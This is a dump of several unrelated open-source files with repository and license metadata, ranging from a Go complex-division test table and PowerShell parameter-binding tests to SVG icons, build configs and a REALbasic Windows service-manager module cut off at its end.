nan), complex(inf, 1), complex(nan, nan)}, {complex(nan, nan), complex(inf, -1), complex(nan, nan)}, {complex(nan, nan), complex(inf, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(-inf, zero), complex(nan, nan)}, {complex(nan, nan), complex(-inf, -zero), complex(nan, nan)}, {complex(nan, nan), complex(-inf, 1), complex(nan, nan)}, {complex(nan, nan), complex(-inf, -1), complex(nan, nan)}, {complex(nan, nan), complex(-inf, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(zero, zero), complex(nan, inf)}, {complex(nan, inf), complex(zero, -zero), complex(nan, inf)}, {complex(nan, inf), complex(zero, 1), complex(inf, nan)}, {complex(nan, inf), complex(zero, -1), complex(-inf, nan)}, {complex(nan, inf), complex(zero, 2), complex(inf, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(zero, zero), complex(nan, inf)}, {complex(nan, inf), complex(-zero, -zero), complex(nan, -inf)}, {complex(nan, inf), complex(zero, 1), complex(inf, nan)}, {complex(nan, inf), complex(-zero, -1), complex(-inf, nan)}, {complex(nan, inf), complex(zero, 2), complex(inf, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(1, zero), complex(nan, inf)}, {complex(nan, inf), complex(1, -zero), complex(nan, inf)}, {complex(nan, inf), complex(1, 1), complex(inf, inf)}, {complex(nan, inf), complex(1, -1), complex(-inf, inf)}, {complex(nan, inf), complex(1, 2), complex(inf, inf)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(-1, zero), complex(nan, -inf)}, {complex(nan, inf), complex(-1, -zero), complex(nan, -inf)}, {complex(nan, inf), complex(-1, 1), complex(inf, -inf)}, {complex(nan, inf), complex(-1, -1), complex(-inf, -inf)}, {complex(nan, inf), complex(-1, 2), complex(inf, -inf)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(2, zero), complex(nan, inf)}, {complex(nan, inf), complex(2, -zero), complex(nan, inf)}, {complex(nan, inf), complex(2, 1), complex(inf, inf)}, {complex(nan, inf), complex(2, -1), complex(-inf, inf)}, {complex(nan, inf), complex(2, 2), complex(inf, inf)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, zero), complex(nan, nan)}, {complex(nan, inf), complex(nan, -zero), complex(nan, nan)}, {complex(nan, inf), complex(nan, 1), complex(nan, nan)}, {complex(nan, inf), complex(nan, -1), complex(nan, nan)}, {complex(nan, inf), complex(nan, 2), complex(nan, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(inf, zero), complex(nan, nan)}, {complex(nan, inf), complex(inf, -zero), complex(nan, nan)}, {complex(nan, inf), complex(inf, 1), complex(nan, nan)}, {complex(nan, inf), complex(inf, -1), complex(nan, nan)}, {complex(nan, inf), complex(inf, 2), complex(nan, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(-inf, zero), complex(nan, nan)}, {complex(nan, inf), complex(-inf, -zero), complex(nan, nan)}, {complex(nan, inf), complex(-inf, 1), complex(nan, nan)}, {complex(nan, inf), complex(-inf, -1), complex(nan, nan)}, {complex(nan, inf), complex(-inf, 2), complex(nan, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(zero, zero), complex(nan, -inf)}, {complex(nan, -inf), complex(zero, -zero), complex(nan, -inf)}, {complex(nan, -inf), complex(zero, 1), complex(-inf, nan)}, {complex(nan, -inf), complex(zero, -1), complex(inf, nan)}, {complex(nan, -inf), complex(zero, 2), complex(-inf, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(zero, zero), complex(nan, -inf)}, {complex(nan, -inf), complex(-zero, -zero), complex(nan, inf)}, {complex(nan, -inf), complex(zero, 1), complex(-inf, nan)}, {complex(nan, -inf), complex(-zero, -1), complex(inf, nan)}, {complex(nan, -inf), complex(zero, 2), complex(-inf, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(1, zero), complex(nan, -inf)}, {complex(nan, -inf), complex(1, -zero), complex(nan, -inf)}, {complex(nan, -inf), complex(1, 1), complex(-inf, -inf)}, {complex(nan, -inf), complex(1, -1), complex(inf, -inf)}, {complex(nan, -inf), complex(1, 2), complex(-inf, -inf)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(-1, zero), complex(nan, inf)}, {complex(nan, -inf), complex(-1, -zero), complex(nan, inf)}, {complex(nan, -inf), complex(-1, 1), complex(-inf, inf)}, {complex(nan, -inf), complex(-1, -1), complex(inf, inf)}, {complex(nan, -inf), complex(-1, 2), complex(-inf, inf)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(2, zero), complex(nan, -inf)}, {complex(nan, -inf), complex(2, -zero), complex(nan, -inf)}, {complex(nan, -inf), complex(2, 1), complex(-inf, -inf)}, {complex(nan, -inf), complex(2, -1), complex(inf, -inf)}, {complex(nan, -inf), complex(2, 2), complex(-inf, -inf)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, zero), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -zero), complex(nan, nan)}, {complex(nan, -inf), complex(nan, 1), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -1), complex(nan, nan)}, {complex(nan, -inf), complex(nan, 2), complex(nan, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(inf, zero), complex(nan, nan)}, {complex(nan, -inf), complex(inf, -zero), complex(nan, nan)}, {complex(nan, -inf), complex(inf, 1), complex(nan, nan)}, {complex(nan, -inf), complex(inf, -1), complex(nan, nan)}, {complex(nan, -inf), complex(inf, 2), complex(nan, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, zero), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, -zero), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, 1), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, -1), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, 2), complex(nan, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, }
Go
4
Havoc-OS/androidprebuilts_go_linux-x86
test/cmplxdivide1.go
[ "BSD-3-Clause" ]
# Copyright (c) Microsoft Corporation. # Licensed under the MIT License. using namespace System.Management.Automation.Language Describe "StaticParameterBinder tests" -Tags "CI" { BeforeAll { $testCases = @( @{ Source = 'Get-Alias abc' Description = 'string constant value' BoundParametersCount = 1 ExceptionCount = 0 ValidateScript = { param ($result) $result.BoundParameters.Name.ConstantValue | Should -Be 'abc' } }, @{ Source = 'Get-Alias {abc}' Description = 'script block value' BoundParametersCount = 1 ExceptionCount = 0 ValidateScript = { param ($result) $result.BoundParameters.Name.Value | Should -BeOfType ([ScriptBlockExpressionAst].FullName) $result.BoundParameters.Name.Value.Extent.Text | Should -Be '{abc}' } }, @{ Source = 'Get-Alias -Path abc' Description = 'parameter -path not found' BoundParametersCount = 0 ExceptionCount = 1 ValidateScript = { param ($result) $result.BindingExceptions.Path.CommandElement.Extent.Text | Should -Be '-Path' $result.BindingExceptions.Path.BindingException.ErrorId | Should -Be 'NamedParameterNotFound' } }, @{ Source = 'Get-Alias -Path -Name:abc' Description = 'parameter -name found while -path not found' BoundParametersCount = 1 ExceptionCount = 1 ValidateScript = { param ($result) $result.BoundParameters.Name.ConstantValue | Should -Be 'abc' $result.BindingExceptions.Path.CommandElement.Extent.Text | Should -Be '-Path' $result.BindingExceptions.Path.BindingException.ErrorId | Should -Be 'NamedParameterNotFound' } }, @{ Source = 'Get-Alias -Name -abc' Description = 'parameter -abc should be used as value' BoundParametersCount = 1 ExceptionCount = 0 ValidateScript = { param ($result) $result.BoundParameters.Name.Value | Should -BeOfType ([CommandParameterAst].FullName) $result.BoundParameters.Name.Value.Extent.Text | Should -Be '-abc' } }, @{ Source = 'Get-Alias aa bb' Description = 'unbound positional parameter bb' BoundParametersCount = 1 ExceptionCount = 1 ValidateScript = { param ($result) $result.BoundParameters.Name.ConstantValue | Should -Be 'aa' $result.BindingExceptions.bb.BindingException.ErrorId | Should -Be 'PositionalParameterNotFound' } }, @{ Source = 'Get-Alias aa,bb,cc' Description = 'array argument' BoundParametersCount = 1 ExceptionCount = 0 ValidateScript = { param ($result) $result.BoundParameters.Name.Value | Should -BeOfType ([ArrayLiteralAst].FullName) $result.BoundParameters.Name.Value.Extent.Text | Should -Be 'aa,bb,cc' } }, @{ Source = 'Get-ChildItem -Name abc -rec' Description = 'switch params and positional param' BoundParametersCount = 3 ExceptionCount = 0 ValidateScript = { param ($result) $result.BoundParameters.Name.ConstantValue | Should -BeTrue $result.BoundParameters.Recurse.ConstantValue | Should -BeTrue $result.BoundParameters.Path.ConstantValue | Should -Be 'abc' } }, @{ Source = 'Get-ChildItem -Name -f' Description = 'switch parameter -name found while ambiguous parameter -f' BoundParametersCount = 1 ExceptionCount = 1 ValidateScript = { param ($result) $result.BoundParameters.Name.ConstantValue | Should -BeTrue $result.BindingExceptions.f.CommandElement.Extent.Text | Should -Be '-f' $result.BindingExceptions.f.BindingException.ErrorId | Should -Be 'AmbiguousParameter' } }, @{ Source = 'Get-ChildItem -Path -f' Description = 'non-switch parameter -path followed by ambiguous parameter -f' BoundParametersCount = 0 ExceptionCount = 1 ValidateScript = { param ($result) $result.BindingExceptions.f.CommandElement.Extent.Text | Should -Be '-f' $result.BindingExceptions.f.BindingException.ErrorId | Should -Be 'AmbiguousParameter' } } ) } It "<Description>: '<Source>'" -TestCases $testCases { param ($Source, $BoundParametersCount, $ExceptionCount, $ValidateScript) $ast = [Parser]::ParseInput($Source, [ref]$null, [ref]$null) $cmdAst = $ast.Find({$args[0] -is [CommandAst]}, $false) $result = [StaticParameterBinder]::BindCommand($cmdAst) $result.BoundParameters.Count | Should -Be $BoundParametersCount $result.BindingExceptions.Count | Should -Be $ExceptionCount . $ValidateScript $result } }
PowerShell
5
dahlia/PowerShell
test/powershell/engine/ParameterBinding/StaticParameterBinder.Tests.ps1
[ "MIT" ]
<svg id="focus-icon" class="focus-row-icon" width="100%" height="100%" viewBox="0 0 60 60" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space="preserve" style="fill-rule:evenodd;clip-rule:evenodd;stroke-linecap:round;stroke-miterlimit:10;"> <path d="M30.028,1L30.028,11" style="fill:none;stroke:rgb(0,168,138);stroke-width:2px;"/> <path d="M30.028,11L34.028,7" style="fill:none;stroke:rgb(0,168,138);stroke-width:2px;"/> <path d="M30.028,11L26.028,7" style="fill:none;stroke:rgb(0,168,138);stroke-width:2px;"/> <path d="M30.028,59L30.028,49" style="fill:none;stroke:rgb(0,168,138);stroke-width:2px;"/> <path d="M30.028,49L26.028,53" style="fill:none;stroke:rgb(0,168,138);stroke-width:2px;"/> <path d="M30.028,49L34.028,53" style="fill:none;stroke:rgb(0,168,138);stroke-width:2px;"/> <path d="M57.972,29.642L50.738,36.876C39.221,48.393 20.548,48.393 9.031,36.876L2.027,29.872L9.261,22.638C20.778,11.121 39.451,11.121 50.968,22.638L57.972,29.642Z" style="fill:rgb(231,236,237);fill-rule:nonzero;"/> <circle cx="29.67" cy="29.783" r="11.813" style="fill:rgb(0,131,192);"/> <path d="M22.857,31C22.305,31 21.857,30.552 21.857,30C21.857,26.14 24.997,23 28.857,23C29.409,23 29.857,23.448 29.857,24C29.857,24.552 29.409,25 28.857,25C26.1,25 23.857,27.243 23.857,30C23.857,30.552 23.41,31 22.857,31Z" style="fill:white;fill-rule:nonzero;"/> </svg>
SVG
2
jlevon/hugo
docs/_vendor/github.com/gohugoio/gohugoioTheme/layouts/partials/svg/focus.svg
[ "Apache-2.0" ]
QT.widgets_private.VERSION = 5.9.4 QT.widgets_private.name = QtWidgets QT.widgets_private.module = QT.widgets_private.libs = $$QT_MODULE_LIB_BASE QT.widgets_private.includes = $$QT_MODULE_INCLUDE_BASE/QtWidgets/5.9.4 $$QT_MODULE_INCLUDE_BASE/QtWidgets/5.9.4/QtWidgets QT.widgets_private.frameworks = QT.widgets_private.depends = core_private gui_private widgets QT.widgets_private.uses = QT.widgets_private.module_config = v2 internal_module QT.widgets_private.enabled_features = widgettextcontrol effects style-fusion style-windows style-windowsxp style-windowsvista QT.widgets_private.disabled_features = gtk3 style-android style-mac
QMake
1
PLohrmannAMD/renderdoc
qrenderdoc/3rdparty/qt/x64/mkspecs/modules/qt_lib_widgets_private.pri
[ "MIT" ]
module Concourse.Cli exposing (Cli(..), clis, downloadUrl, id, label) import Api.Endpoints as Endpoints import Url.Builder clis : List Cli clis = [ OSX, Windows, Linux ] type Cli = OSX | Windows | Linux downloadUrl : Cli -> String downloadUrl cli = let platformName = case cli of OSX -> "darwin" Windows -> "windows" Linux -> "linux" in Endpoints.Cli |> Endpoints.toString [ Url.Builder.string "arch" "amd64" , Url.Builder.string "platform" platformName ] label : Cli -> String label cli = let platformName = case cli of OSX -> "OS X" Windows -> "Windows" Linux -> "Linux" in "Download " ++ platformName ++ " CLI" id : Cli -> String id cli = case cli of OSX -> "osx" Windows -> "windows" Linux -> "linux"
Elm
5
Caprowni/concourse
web/elm/src/Concourse/Cli.elm
[ "Apache-2.0" ]
(module (import "./env.js" "a" (global i32)) (import "./env.js" "b" (global i32)) (global $c i32 (i32.const 3)) (global $d i32 (i32.const 4)) (export "c" (global $c)) (export "d" (global $d)) )
WebAssembly
3
1shenxi/webpack
test/cases/wasm/imported-global-preserve-ordering/module.wat
[ "MIT" ]
module Math use Core // #.=----=----=----= pub fn PI () { 3.1415926535897932 } pub fn PI2 () { 6.2831853071795864 } pub fn PI1_2 () { 1.5707963267948966 } pub fn E () { 2.7182818284590452 } pub fn LOG2 () { 0.6931471805599453 } pub fn LOG10 () { 2.3025850929940456 } pub fn SQRT2 () { 1.4142135623730950 }
Opal
3
iitalics/Opal
opal_libs/Math/constants.opal
[ "MIT" ]
option solver gurobi; option gurobi_options "timelim=259200"; # 3days option gurobi_options "outlev=1";
AMPL
2
thuenen/State-Elimination-for-Mixed-Integer-Optimal-Control-of-PDEs-by-Semigroup-Theory
HeatCtrl/gurobi.ampl
[ "MIT" ]
such foo shh 1 wow woof bar be foo
Dogescript
0
erinkeith/dogescript
test/spec/exports/named/property/source.djs
[ "MIT" ]
# EDGELIB project file (edit at your own risk) # Copyright (c) 2004-2017 Elements Interactive B.V. # ----------------------------------------- # General project properties projectname = "edgesaver" caption = "Edge Saver" vendor = "Elements Interactive B.V." vendorshort = "EI" domain = "nl.edgelib.samples.edgesaver" target type = "bin" appuid = "0x10205da5" version = "1.00.0" capabilities = "None" fwdependencies = "None" selplatform = "None" noresemu = "1" # Project source, header and resource tree sourcefile = "..\code\edgesaver.cpp" resourcepath = "Icons" resourcefile = "..\res\icons\icon64.bmp" resourcefile = "..\res\icons\icon48.bmp" resourcefile = "..\res\icons\icon32.bmp" resourcefile = "..\res\icons\icon24.bmp" resourcefile = "..\res\icons\icon20.bmp" resourcefile = "..\res\icons\icon16.bmp" endpath = 1 # Project environment incpath = "."
Ecere Projects
2
elementsinteractive/edgelib
samples/EdgeSaver/workspace_eide/edgesaver.epj
[ "BSD-3-Clause" ]
.root display: inline-block font: bold var(--font-size-xs)/#{1} var(--font-secondary) background: var(--color-theme) color: var(--color-back) padding: 2px 6px 4px border-radius: 1em text-transform: uppercase vertical-align: middle .spaced margin-left: 0.75em margin-right: 0.5em .icon margin-left: 0.5em
Sass
4
snosrap/spaCy
website/src/styles/tag.module.sass
[ "MIT" ]
<svg xmlns="http://www.w3.org/2000/svg" enable-background="new 0 0 20 20" height="20" viewBox="0 0 20 20" width="20"><g><rect fill="none" height="20" width="20"/></g><g><g><path d="M7.03,16.33C7.93,16.76,8.94,17,10,17c2.41,0,4.54-1.22,5.8-3.08l-2.3-1.33L7.03,16.33z"/><path d="M9.5,9.71V3.03C8.61,3.09,7.77,3.32,7,3.68v7.47L9.5,9.71z"/><path d="M10,10.58l-5.8,3.35c0.49,0.72,1.11,1.34,1.82,1.83l6.47-3.74L10,10.58z"/><path d="M6,4.26C4.19,5.53,3,7.62,3,10c0,1.1,0.26,2.13,0.71,3.05L6,11.73V4.26z"/><path d="M10.5,6.82v2.89l5.79,3.34c0.37-0.76,0.61-1.6,0.68-2.49L10.5,6.82z"/><path d="M16.97,9.41c-0.29-3.42-3.03-6.14-6.47-6.39v2.64L16.97,9.41z"/></g></g></svg>
SVG
2
elisoncrum/piipan
query-tool/src/Piipan.QueryTool/wwwroot/images/usa-icons-unused/sports_volleyball.svg
[ "CC0-1.0" ]
#tag Module Protected Module ServiceManagerWFS #tag Method, Flags = &h1 Protected Sub AddService(ByRef serv as ServiceWFS) #if TargetWin32 Soft Declare Function CreateServiceA Lib "AdvApi32" ( manager as Integer, name as CString, _ displayName as CString, access as Integer, serviceType as Integer, startType as Integer, _ errorControl as Integer, binaryPath as CString, loadOrder as CString, tagID as Integer, _ dependencies as CString, accountName as CString, password as CString ) as Integer Soft Declare Function CreateServiceW Lib "AdvApi32" ( manager as Integer, name as WString, _ displayName as WString, access as Integer, serviceType as Integer, startType as Integer, _ errorControl as Integer, binaryPath as WString, loadOrder as WString, tagID as Integer, _ dependencies as WString, accountName as WString, password as WString ) as Integer if mManager = 0 then return dim path as String path = """" + serv.ExecutableFile.AbsolutePath + """" if serv.StartupParameters <> "" then path = path + " " + serv.StartupParameters end if System.IsFunctionAvailable( "CreateServiceW", "AdvApi32" ) then serv.Handle = CreateServiceW( mManager, serv.Name, serv.DisplayName, kAccessServiceAll, serv.Type, _ serv.StartType, serv.ErrorControl, path, serv.LoadOrderGroup, _ 0, serv.Dependencies, serv.StartName, serv.Password ) else serv.Handle = CreateServiceA( mManager, serv.Name, serv.DisplayName, kAccessServiceAll, serv.Type, _ serv.StartType, serv.ErrorControl, path, serv.LoadOrderGroup, _ 0, serv.Dependencies, serv.StartName, serv.Password ) end if if serv.Handle <> 0 then ModifyService( serv ) end #else #pragma unused serv #endif End Sub #tag EndMethod #tag Method, Flags = &h1 Protected Sub CloseService(serv as ServiceWFS) #if TargetWin32 CloseServiceHandle( serv.Handle ) #else #pragma unused serv #endif End Sub #tag EndMethod #tag Method, Flags = &h21 Private Sub CloseServiceHandle(handle as Integer) #if TargetWin32 Declare Sub CloseServiceHandle Lib "AdvApi32" ( handle as Integer ) CloseServiceHandle( handle ) #else #pragma unused handle #endif End Sub #tag EndMethod #tag Method, Flags = &h21 Private Sub FillServiceInformation(ByRef serv as ServiceWFS) #if TargetWin32 Soft Declare Function QueryServiceConfigA Lib "AdvApi32" ( handle as Integer, _ config as Ptr, size as Integer, ByRef bytesNeeded as Integer ) as Boolean Soft Declare Function QueryServiceConfigW Lib "AdvApi32" ( handle as Integer, _ config as Ptr, size as Integer, ByRef bytesNeeded as Integer ) as Boolean dim mb as new MemoryBlock( 4096 ) dim bytesNeeded as Integer dim err as Boolean dim unicodeSavvy as Boolean = System.IsFunctionAvailable( "QueryServiceConfigW", "AdvApi32" ) if unicodeSavvy then err = QueryServiceConfigW( serv.Handle, mb, mb.Size, bytesNeeded ) else err = QueryServiceConfigA( serv.Handle, mb, mb.Size, bytesNeeded ) end if if not err and bytesNeeded > 0 then mb = new MemoryBlock( bytesNeeded ) if unicodeSavvy then err = QueryServiceConfigW( serv.Handle, mb, mb.Size, bytesNeeded ) else err = QueryServiceConfigA( serv.Handle, mb, mb.Size, bytesNeeded ) end if if not err then return end dim path as String dim params as String dim num as Integer try serv.Type = mb.Long( 0 ) serv.StartType = mb.Long( 4 ) serv.ErrorControl = mb.Long( 8 ) // Get the path if unicodeSavvy then path = mb.Ptr( 12 ).WString( 0 ) else path = mb.Ptr( 12 ).CString( 0 ) end if // Get the startup parameters and remove the "'s num = CountFields( path, """" ) params = Trim( NthField( path, """", num ) ) path = mid( path, Len( params ) ) path = Trim( ReplaceAll( path, """", "" ) ) serv.ExecutableFile = new FolderItem( path ) serv.StartupParameters = params if unicodeSavvy then serv.LoadOrderGroup = mb.Ptr( 16 ).WString( 0 ) serv.Dependencies = mb.Ptr( 24 ).WString( 0 ) serv.StartName = mb.Ptr( 28 ).WString( 0 ) else serv.LoadOrderGroup = mb.Ptr( 16 ).CString( 0 ) serv.Dependencies = mb.Ptr( 24 ).CString( 0 ) serv.StartName = mb.Ptr( 28 ).CString( 0 ) end if if serv.StartName = "" then serv.StartName = "LocalSystem" end if unicodeSavvy then serv.DisplayName = mb.Ptr( 32 ).WString( 0 ) else serv.DisplayName = mb.Ptr( 32 ).CString( 0 ) end if catch excerr as RuntimeException end Soft Declare Function QueryServiceConfig2A Lib "AdvApi32" ( handle as Integer, level as Integer, _ buffer as Ptr, size as Integer, ByRef bytesNeeded as Integer ) as Boolean Soft Declare Function QueryServiceConfig2W Lib "AdvApi32" ( handle as Integer, level as Integer, _ buffer as Ptr, size as Integer, ByRef bytesNeeded as Integer ) as Boolean unicodeSavvy = System.IsFunctionAvailable( "QueryServiceConfig2W", "AdvApi32" ) dim description as new MemoryBlock( 4 ) if unicodeSavvy then err = QueryServiceConfig2W( serv.Handle, &h1, description, description.Size, bytesNeeded ) else err = QueryServiceConfig2A( serv.Handle, &h1, description, description.Size, bytesNeeded ) end if if not err and bytesNeeded > 0 then description = new MemoryBlock( bytesNeeded ) if unicodeSavvy then err = QueryServiceConfig2W( serv.Handle, &h1, description, description.Size, bytesNeeded ) else err = QueryServiceConfig2A( serv.Handle, &h1, description, description.Size, bytesNeeded ) end if if not err then return end try if unicodeSavvy then serv.Description = description.Ptr( 0 ).WString( 0 ) else serv.Description = description.Ptr( 0 ).CString( 0 ) end if catch excerr2 as RuntimeException end #else #pragma unused serv #endif End Sub #tag EndMethod #tag Method, Flags = &h1 Protected Sub Finalize() // Close the manager CloseServiceHandle( mManager ) End Sub #tag EndMethod #tag Method, Flags = &h1 Protected Sub Initialize() // Open the manager mManager = OpenManager End Sub #tag EndMethod #tag Method, Flags = &h1 Protected Sub ModifyService(serv as ServiceWFS) // You have to be sure that the service was opened with the ability to change // the configuration. #if TargetWin32 Soft Declare Sub ChangeServiceConfigA Lib "AdvApi32" ( handle as Integer, type as Integer, _ startType as Integer, errorControl as Integer, path as CString, loadGroup as CString, _ tag as Integer, dependencies as CString, startName as CString, password as CString, _ displayName as CString ) Soft Declare Sub ChangeServiceConfigW Lib "AdvApi32" ( handle as Integer, type as Integer, _ startType as Integer, errorControl as Integer, path as WString, loadGroup as WString, _ tag as Integer, dependencies as WString, startName as WString, password as WString, _ displayName as WString ) dim path as String path = """" + serv.ExecutableFile.AbsolutePath + """" if serv.StartupParameters <> "" then path = path + " " + serv.StartupParameters end if System.IsFunctionAvailable( "ChangeServiceConfigW", "AdvApi32" ) then ChangeServiceConfigW( serv.Handle, serv.Type, serv.StartType, serv.ErrorControl, _ path, serv.LoadOrderGroup, 0, serv.Dependencies, serv.StartName, serv.Password, _ serv.DisplayName ) else ChangeServiceConfigA( serv.Handle, serv.Type, serv.StartType, serv.ErrorControl, _ path, serv.LoadOrderGroup, 0, serv.Dependencies, serv.StartName, serv.Password, _ serv.DisplayName ) end if Soft Declare Sub ChangeServiceConfig2A Lib "AdvApi32" ( handle as Integer, level as Integer, buffer as Ptr ) Soft Declare Sub ChangeServiceConfig2W Lib "AdvApi32" ( handle as Integer, level as Integer, buffer as Ptr ) if System.IsFunctionAvailable( "ChangeServiceConfig2W", "AdvApi32" ) then dim description as new MemoryBlock( Len( serv.Description ) * 2 + 2 ) dim descHandle as new MemoryBlock( 4 ) description.WString( 0 ) = serv.Description descHandle.Ptr( 0 ) = description ChangeServiceConfig2W( serv.Handle, &h1, descHandle ) else dim description as new MemoryBlock( Len( serv.Description ) + 1 ) dim descHandle as new MemoryBlock( 4 ) description.CString( 0 ) = serv.Description descHandle.Ptr( 0 ) = description ChangeServiceConfig2A( serv.Handle, &h1, descHandle ) end if #else #pragma unused serv #endif End Sub #tag EndMethod #tag Method, Flags = &h21 Private Function OpenManager() As Integer #if TargetWin32 Soft Declare Function OpenSCManagerA Lib "AdvApi32" ( computer as Integer, database as Integer, access as Integer ) as Integer Soft Declare Function OpenSCManagerW Lib "AdvApi32" ( computer as Integer, database as Integer, access as Integer ) as Integer Const SC_MANAGER_CONNECT = &h1 Const SC_MANAGER_CREATE_SERVICE = &h2 Const SC_MANAGER_ENUMERATE_SERVICE = &h4 Const SC_MANAGER_LOCK = &h8 Const SC_MANAGER_QUERY_LOCK_STATUS = &h10 Const SC_MANAGER_MODIFY_BOOT_CONFIG = &h20 Const STANDARD_RIGHTS_REQUIRED = &h000F0000 Const SC_MANAGER_ALL_ACCESS = &hF003F if System.IsFunctionAvailable( "OpenSCManagerW", "AdvApi32" ) then return OpenSCManagerW( 0, 0, SC_MANAGER_ALL_ACCESS ) else return OpenSCManagerA( 0, 0, SC_MANAGER_ALL_ACCESS ) end if #endif End Function #tag EndMethod #tag Method, Flags = &h1 Protected Function OpenService(name as String, access as Integer) As ServiceWFS dim serv as ServiceWFS #if TargetWin32 Soft Declare Function OpenServiceA Lib "AdvApi32" ( manager as Integer, name as CString, _ access as Integer ) as Integer Soft Declare Function OpenServiceW Lib "AdvApi32" ( manager as Integer, name as WString, _ access as Integer ) as Integer if mManager = 0 then return nil serv = new ServiceWFS if System.IsFunctionAvailable( "OpenServiceW", "AdvApi32" ) then serv.Handle = OpenServiceW( mManager, name, access ) else serv.Handle = OpenServiceA( mManager, name, access ) end if if serv.Handle = 0 then return nil if Bitwise.BitAnd( access, kAccessServiceQueryConfig ) <> 0 then FillServiceInformation( serv ) end #else #pragma unused name #pragma unused access #endif return serv End Function #tag EndMethod #tag Method, Flags = &h1 Protected Sub RemoveService(s as ServiceWFS) #if TargetWin32 // We want to delete the service, so this assumes that we // have already opened the service. If we don't have a Handle // then we will try to use the Name Declare Sub DeleteService Lib "AdvApi32" ( handle as Integer ) dim handle as Integer dim closeTheHandle as Boolean if s.Handle > 0 then // We can just delete as normal handle = s.Handle else // We don't have a valid handle, so open up the // service by name handle = OpenService( s.Name, &hF0000 ).Handle // And be sure to close the handle when we're done closeTheHandle = true end if handle > 0 then DeleteService( handle ) end if closeTheHandle then CloseServiceHandle( handle ) end #else #pragma unused s #endif End Sub #tag EndMethod #tag Property, Flags = &h21 Private mManager As Integer #tag EndProperty #tag Constant, Name = kAccessServiceAll, Type = Integer, Dynamic = False, Default = \"&h000F01FF", Scope = Protected #tag EndConstant #tag Constant, Name = kAccessServiceChangeConfig, Type = Integer, Dynamic = False, Default = \"&h2", Scope = Protected #tag EndConstant #tag Constant, Name = kAccessServiceEnumerateDependents, Type = Integer, Dynamic = False, Default = \"&h8", Scope = Protected #tag EndConstant #tag Constant, Name = kAccessServiceInterrogate, Type = Integer, Dynamic = False, Default = \"&h80", Scope = Protected #tag EndConstant #tag Constant, Name = kAccessServicePauseContinue, Type = Integer, Dynamic = False, Default = \"&h40", Scope = Protected #tag EndConstant #tag Constant, Name = kAccessServiceQueryConfig, Type = Integer, Dynamic = False, Default = \"&h1", Scope = Protected #tag EndConstant #tag Constant, Name = kAccessServiceQueryStatus, Type = Integer, Dynamic = False, Default = \"&h4", Scope = Protected #tag 